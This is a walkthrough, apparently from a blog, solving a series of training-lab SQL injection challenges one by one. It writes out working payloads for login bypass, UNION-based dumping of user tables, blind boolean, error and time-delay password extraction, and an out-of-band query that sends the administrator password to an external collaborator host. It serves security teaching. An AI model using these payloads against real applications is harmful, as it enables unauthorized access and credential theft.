SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
Task
Going over to the webpage and clicking on Gifts
You should get this,
Now, lets capture this request on burpsuite
Sending the request over to burp repeater,
To display one or more unreleased products, we can use the payload ' or 1=1--, make sure this is url encoded to something like this '+or+1%3d1--.
Adding this payload to the url,
cool, the status code is âokâ. Viewing the response in our browser
Nice, we have successfully solved the labđ.
SQL injection vulnerability allowing login bypass
Task
Navigating to the webpage and clicking on âMy Accountâ
You should get this,
So we are asked to login as the administrator user, to do this we can use this
username:administrator'-- password:aaaaaaa
Note: We can either provide a blank password or we use any random stuff for the password since the password will get commented out anyways
Cool, we have successfully solved the lab
SQL injection attack, querying the database type and version on Oracle
Task
Navigating to the webpage
Capturing the request on burpsuite,
First thing to do is to confirm the number of columns available in the database
So, weâll be using the query
' order by 1--
' order by 2--
' order by 3--
Ensure this is url encoded, so when you get the internal server error, it means the column number isnât available
This means thereâs a column available in the database,
Trying other queries
This makes it 2 columns available in the database,
From the above screenshot youâll see that the query ' order by 3-- returned an Internal Server Error, which means there isnât a column 3 available in the database.
So, we have 2 columns available in the database.
To query the database version we can use the following query
' UNION SELECT banner,null FROM v$version--
Explaining this
The banner column contains the information about the database version
The null is just there to fill in for the second column of the result
v$version is the name of a database table
Trying the query
Lets show the response in our browser
Nice, we have successfully solved the lab
SQL injection attack, querying the database type and version on MySQL and Microsoft
Task
Navigating to the webpage, clicking on âGiftsâ
Capturing this request on burpsuite and sending it over to burp intruder
Now, lets check the number of columns available in the database using the query
' order by 1-- -
' order by 2-- -
' order by 3-- -
Ensure this is url encoded, so when you get the internal server error, it means the column number isnât available
This means we have a column available in the database.
Moving on,
This means we have 2 columns available in the database.
Moving on,
From the above screenshot youâll see that the query ' order by 3-- - returned an Internal Server Error, which means there isnât a column 3 available in the database.
Now, to display the database version string, we can use the query
' UNION SELECT version(),null-- -
Using this query
Now, lets show this response in our browser
Nice, we have successfully completed the task for this labđ
SQL injection attack, listing the database contents on non-Oracle databases
Task
Navigate to the webpage and click on âGiftâ
Capturing the request on burpsuite and sending it over to burp repeater
First, lets check the number of columns available in this database.
We can do that using the queries
' order by 1--
' order by 2--
' order by 3--
Ensure you url encode the queries before using themm
Now, this means we have a column available in the database.
Moving on,
We have 2 columns available in the database.
Moving on,
We got an Internal Server Error here, this means there isnât a column 3 available in the database.
Hence, we have 2 columns available in the database.
Lets try to get the version the database is running, we can use the query
' UNION SELECT version(),null--
Now, lets check the name of the tables in the database. We can use the query
' UNION SELECT table_name,null FROM information_schema.tables--
Applying this query
We found a table users_vqdnay.
Next thing to do is to check the name of the columns in the table, we can use the query
' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name='users_vqdnay'--
Applying this query
We got the columns username_dgcaur and password_eygubt.
Cool, lets dump the contents of the columns using the query
' UNION SELECT username_dgcaur,password_eygubt FROM users_vqdnay--
Applying this query
We got the credentials for the administrator user
username:administrator password:7ocf0wre9y16c1llsdp1
Lets go ahead and log in
Nice, we have succesfully completed the task for this lab.
SQL injection attack, listing the database contents on Oracle
Task
Navigate to the webpage and click on âGiftsâ
Capturing this request on burpsuite and sending it over to burp repeater,
Lets start out by checking the amount of columns available in the database. We can use the queries
' order by 1--
' order by 2--
' order by 3--
Ensure the queries are url encoded before applying them
This means we have a column available in the database
Moving on,
Now, this means we have 2 columns available in the database
Moving on,
The âInternal Server Errorâ means that there isnât a third column available in the database.
Lets check the version the database is running using the query
' UNION SELECT banner,null FROM v$version--
Applying this query
Cool, we were able to get the version the database is running.
To get the name of the tables in the database, we can use the query
' UNION SELECT table_name,null FROM all_tables--
Applying this query
We found the table name USERS_DHHSSL
The next thing to do is check the name of columns available in the table. We can do that using the query
' UNION SELECT column_name,null FROM all_tab_columns WHERE table_name='USERS_DHHSSL'--
Applying this query
We got the column names USERNAME_ZTMDCJ and PASSWORD_QGFLBW.
Now, lets go ahead and dump the contents of the columns using the query
' UNION SELECT USERNAME_ZTMDCJ,PASSWORD_QGFLBW FROM USERS_DHHSSL--
Applying this query
We got the creds for the administrator user
username:administrator password:8aqefrxiudrdaqkhk3qf
Lets go ahead and login as the administrator user
Cool stuff, we have successfully completed the task for this lab.
SQL injection UNION attack, determining the number of columns returned by the query
Task
Navigate to the webpage and click on âGiftsâ
Capturing this request on burpsuite and sending it over to burp repeater,
We can use UNION attack to determine the number of column available. We can use the query
' UNION SELECT null--
' UNION SELECT null,null--
' UNION SELECT null,null,null--
' UNION SELECT null,null,null,null--
So, weâll continue the query like that until we get a HTTP response code 200 OK.
Note: You stop the query when you get HTTP response code 200 OK
Url Encode the queries before applying them
This means, thereâs more than one column in the database, hence why we are getting the âInternal Server Errorâ
We got the error, which means there are more than two columns in the database
Moving on,
We got the HTTP response code 200 OK, which means there are 3 columns in the database.
Showing the response in our browser
We have successfully completed the task for this lab
SQL injection UNION attack, finding a column containing text
Task
Navigate to the webpage and click on âLifestyleâ
Capturing this request on burpsuite and sending it over to burp repeater
First, lets determine the number of columns thatâs available in the database using the query
' order by 1--
' order by 2--
' order by 3--
' order by 4--
Ensure you url encode the query when you use it.
This means we have a column available in the database.
Moving on,
Alright, so we have 2 columns available in the database.
Moving on,
So, there are 3 columns available in the database.
Moving on,
We got an âInternal Server Errorâ meaning there isnât a column 4 in the database
Hence, we have 3 columns available in the database.
So, the task is to check which of the columns is compatible with string data. So, we are asked to return the string yuJfMW.
Now, lets start by using the UNION method to confirm the number of columns. We can use the query
' UNION SELECT null,null,null--
If we donât get the âInternal Server Errorâ it means there truly are 3 columns available in the database.
Applying the query
cool, now lets look for the vulnerable column that is compatible with string data. We can try the following queries
' UNION SELECT 'yuJfMW',null,null--
' UNION SELECT null,'yuJfMW',null--
' UNION SELECT null,null,'yuJfMW'--
So, a query not returning the âInternal Server Errrorâ means the column where the string is positioned is vulnerable.
Applying the queries,
From the above screensots, youâll see that only the query ' UNION SELECT null,'yuJfMW',null-- was able to retrieve the string from the database.
Lets try to show the response in our browser
Cool, we have successfully solved the lab. So, it is safe to say the second column is compatible with string data.
SQL injection UNION attack, retrieving data from other tables
Task
Navigate to the webpage and click on âLifestyleâ
Capturing this request on burpsuite and sending it over to burp repeater,
Now, this should be an easy one since they already gave us the name of the table to be users, also in the table there are columns username and password. So, what weâll try to do is just determine the number of columns available in the database. Weâll be using the query
' order by 1--
' order by 2--
' order by 3--
Applying the query
We have a column available in the database
Moving on,
Alright, so 2 columns are available in the database
Moving on,
The âInternal Server Errorâ displayed is to tell us that there isnât a third column in the database.
So, we have 2 columns available in this database
Now, lets go ahead to dump the content of the columns username and password in the table users. We can use this query
' UNION SELECT username,password FROM users--
Applying this query
Cool, we got the creds for the administrator user
username:administrator password:nqic8fkyvzqjfez72khh
Lets try to log in with thi creds
Cool, we have successfully completed the task for this lab
SQL injection UNION attack, retrieving multiple values in a single column
Task
Navigate to the website and click on âLifestyleâ
Capturing the request on burpsuite and sending it over to burp repeater,
Lets go ahead and check the number of columns available in the database, we can use the queries
' order by 1--
' order by 2--
' order by 3--
Using these queries
From the above screenshot, it is obvious that we have just 2 columns available in the database.
Lets go ahead and look for the vulnerable column, that is, the column that is compatible with string data. To do that we can use the query
' UNION SELECT 'abeg',null--
' UNION SELECT null,'abeg'--
url encode the query before using it
It is evident that the second column is actually compatible with string data.
Now, lets go ahead to dump the content of the columns username and password in the table users. We can use this query
' UNION SELECT null,username || '~' || password FROM users--
Applying the query
Cool, we got the creds for the administrator user.
username:administrator password:6tp172ew9j1sy5f7vx3d
Lets try to log in with this creds we found
Cool, we have successfully solved this lab.
Blind SQL injection with conditional responses
Task
So, the application uses a tracking cookie for analytics
Navigate to the webpage
Click âView detailsâ then capture the request on burpsuite
Now, lets use conditional responses to check if it is vulnerable to blind SQLi. We can use the queries
' AND '1'='1
' AND '1'='2
Ensure it is url encoded when using it
From the above screenshot we got the âWelcome back!â message, this is because the condition '1'='1 is always true.
Trying the second query
So, this didnât return the âWelcome back!â message, this is because the condition '1'='2 is always false.
Now, that we have confirmed that it is vulnerable, lets go ahead to obtain the password since we know the table name to be users and the name of the columns in the tables are username and password. Also, we have the username to be administrator.
Based on the hint we were provided, I think we now know what to focus on
To achieve this, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's
Alright so, weâll be trying the letters all the way from a-z, weâll also try the numbers 0-9, until we get a âWelcome back!â message
Trying this query you should get the first character of the password
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 'p
Cool, now that we got the first character, lets go ahead and query for the second character, We can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 2, 1) = 'q
Getting the 3rd character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 3, 1) = 'l
Getting the 4th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 4, 1) = '8
Getting the 5th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 5, 1) = 'z
Getting the 6th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 6, 1) = 's
Getting the 7th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 7, 1) = 'm
Getting the 7th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 8, 1) = 'j
Getting the 8th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 8, 1) = 'j
Getting the 9th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 9, 1) = 'x
Getting the 10th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 10, 1) = 'r
Getting the 11th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 11, 1) = '7
Getting the 12th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 12, 1) = 'b
Getting the 13th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 13, 1) = 'i
Getting the 14th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 14, 1) = 'i
Getting the 15th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 15, 1) = 'y
Getting the 16th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 16, 1) = 'l
Getting the 17th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 17, 1) = 'u
Getting the 18th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 18, 1) = 'q
Getting the 19th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 19, 1) = 't
Getting the 20th character, we can use the query
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 20, 1) = 'j
So we got the final password to be pql8zsmjxr7biiyluqtj. Lets try to login as the administrator user
Nice, we have successfully solved this lab
Blind SQL injection with conditional errors
Task
Navigate to the webpage and click on âview detailsâ
Capturing the request on burpsuite and sending it over to burp repeater
Now, lets start by testing conditions.
From the hint provided we can see that this lab uses the oracle dabase
So, using this query we should be able to test the conditions
'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE NULL END FROM dual)||'
'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE NULL END FROM dual)||'
Ensure you url encode this before using it
We got the âInternal Server Errorâ, this is because 1=1 will always be true at all times
Trying the second query
This query didnât throw an error because the condition 1=2 is not true
Now, to check if there really exists a user administrator, we can use the query
'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
If this returns an error it means the user exists in the database
Cool, the user is available in the database.
Lets go ahead and check the length of the password available in the database, we can use the query
'||(SELECT CASE WHEN LENGTH(password)>1 THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
So, we are going to keep changing the number 1 until we stop getting an error
From the above screenshot it is evident that the password is greater than one. Trying this manually;
From the above screenshot, we can easily tell the the length of the password is 20.
Now, lets go ahead and extract the password. We can use this query
'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
We can see it didnât return an error, this means the string isnât the first character of the password.
Lets use burp intruder to bruteforce this instead of testing it one by one.
Send the request from burp repeater to burp intruder
highlight the a and click on add, leave the attack type as sniper. After doing all these, you should have something like this
Now, click on payloads. You should get this
Editing this,
weâll assume that the password contains only lowercase alphanumeric characters. So, weâll add the payloads in the range a - z and 0 - 9
Click on âstart attackâ
We got our first character
Getting the 2nd character we can use the query
'||(SELECT CASE WHEN SUBSTR(password,2,1)='a' THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
Using burp intruder
starting the attack
We got the 2nd character
Getting the 3rd character, we can use the query
'||(SELECT CASE WHEN SUBSTR(password,3,1)='a' THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
Using burp inruder
Starting the attack
We got the 3rd character
Getting the 4th character, we can use the query
'||(SELECT CASE WHEN SUBSTR(password,4,1)='a' THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
Using burp intruder
Starting the attack
We got the 4th character
Getting the 5th character, we can use the query
'||(SELECT CASE WHEN SUBSTR(password,5,1)='a' THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
Using burp intruder
Starting the attack
We got the 5th character
We can continue this process, until we get to the 20th character(since we already know the password length to be 20). We can use the query
'||(SELECT CASE WHEN SUBSTR(password,20,1)='a' THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator')||'
Using burp intruder
Starting the attack
We got the 20th character.
So, I got the password to be b7dj6cx48d5qx0yzg7ld, lets use this password to log in as the administrator user
Cool stuff, we have completed the task for this lab,
Visible error-based SQL injectionVisible error-based SQL injection
Task
Navigate to the webpage and click on âView datailsâ
Capturing the request on burpsuite and sending it over to burp repeater
Lets try to trigger a sql error using the ' symbol
You can see we got the error âUnterminated string lateralâ, if you also observed an extra character ' got added to the cookie section. So, lets try to comment that out using --
cool, you can see we didnât get an error, so this means weâve got the right query.
Now, lets try to use the CAST() function
' AND CAST((SELECT 1) AS int)--
Ensure this is url encoded
From the error we have to make the argument AND boolean. We can solve that using this query
' AND 1=CAST((SELECT 1) AS int)--
Applying this query
you can see we didnât get any error
Since we were told that there is a table called users with columns username and password. Also, there is a username administrator
We can use this query to check for users
' AND 1=CAST((SELECT username FROM users) AS int)--
We get another error, so there seems to be a character limit here. To get this solved, lets delete the value of the TrackingId
We get another error telling us that our query returned more than one row. Modifying the query to return just one row, we can use the query
' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
Using this query
cool, we got the first username in the users table to be administrator. Lets go ahead and leak the password hehe
This query will help us with that
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--
Cool, we got the password of the administrator user to be zyxtiwdkhp96r63vsz5m.
Now, lets go ahead and login as the administrator user
Nice, we have successfully solved this lab
Blind SQL injection with time delays
Task
Navigate to the webpage and click on âView detailsâ
Capturing the request and sending it over to burp repeater
To trigger a 10 seconds delay, we can use the query
'|| pg_sleep(10)--
Ensure the query is url encoded
Cool, we have successfully completed the task for this lab
Blind SQL injection with time delays and information retrieval
Task
Navigate to the webpage and click on âView detailsâ
Captutring this request and sending it over to burp repeater
Lets start by triggering a 10s delay
'|| pg_sleep(10)--
Alright, cool we were able to trigger a 10 seconds delay
We know the table name to be users, the column names are username and password, then the name of the user is administrator
But lets try to confirm if there really is a username administrator, we can use the query
';SELECT CASE WHEN (username='administrator') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
Ensure the query is url encoded
Now that weâve confirmed that the username is present in the database. Lets check the length of the password. We can use the query
';SELECT CASE WHEN (username='administrator' AND LENGTH(password)>1) THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
This confirmed that the password is greater than 1
This screenshot confirmed that the length of the passowrd to be 20
Now that we know the length of the password lets start extracting the characters one by one. Weâll be inviting burp intruder to the party. We can use the query
';SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,1,1)='m') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
Lets assume the password characters to be lowercase alphanumeric characters.
using the query
We didnât get the 10s delay which means m isnât the first character of the password.
Trying the other characters,
I got the first character of the password to be 7
To get the second character, we can use the query
';SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,2,1)='m') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
I got the second character of the password to be v
To get the third character of the password, you can use the query
';SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,3,1)='m') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
I got the third character of the password to be 3.
This process can be continued until we get to the 20th password character
To get the 20th character, you can use the query
';SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,20,1)='h') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--
I got the last password to be h.
I got the full password to be 7v3zmmujptl7r634bjlh. Now, lets go ahead and log in as the administrator user
cool stuff, we have successfully solved this lab
Blind SQL injection with out-of-band interaction
Task
Navigate to the webpage and click on âView detailsâ
Capturing the request on burpsuite and sending it over to burp repeater
To trigger out-of-band interaction with burp collaborator, we can use the query
' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual--
To get the payload from burp collaborator client
Now, lets paste this query using the payload we got from burp collaborator client
' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://8cllzq3qnv0bxuz5k1o5wgeokfq6ev.oastify.com/"> %remote;]>'),'/l') FROM dual--
Ensure the query is url encoded
Cool, we were ale to achieve dns lookup.
Going back to our browser
We have successfully solved this lab.
Blind SQL injection with out-of-band data exfiltration
Task
Navigate to the webpage and click on âView detailsâ
Capturing the request and sending it over to burp repeater
Weâll be using burp collaborator client for this task since we were given the table name to be users and the column names to be username and password, we also have the username to be administrator so all we need is the password of the admin user
' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.0tu71gj5zpi129crwrp9uf5rlir9fy.oastify.com/"> %remote;]>'),'/l') FROM dual--
Replace 0tu71gj5zpi129crwrp9uf5rlir9fy.oastify.com with the payload you got from your burp collaborator
Applying this query
Checking Burp Collaborator Client, click on âpoll nowâ, you should get this
Take a look at the domain name, the payload we got from burp collaborator client was 0tu71gj5zpi129crwrp9uf5rlir9fy.oastify.com but we got something different for the domain name
The password for the administrator user is the set of alphanumeric characters before the payload. So pfohk2cgqxm2ktuoer65 is the administrator password. Lets go ahead and login as the administrator user
We have successfully solved the labđ
SQL injection with filter bypass via XML encoding
Task
Navigate to the webpage
click on stock and capture the request on burpsuite
So, we have a table users and columns username and password
Checking the hint we were given
Letâs try to download this extension
We are done installing it. Weâll be using this query to dump the contents of the database
1 UNION SELECT username || ':' || password FROM users
our attack got detected, lets encode this using the hackvertor extension we just installed. To do this
just highlight the query, right-click, then select Extensions > Hackvertor > Encode > dec_entities
We have successfully dumped the contents of the database. Lets go ahead and login as the administrator user
username:administrator password:hhkovl3d48vch2ix840b
We have successfully completed this labđ
Till Next Time :xD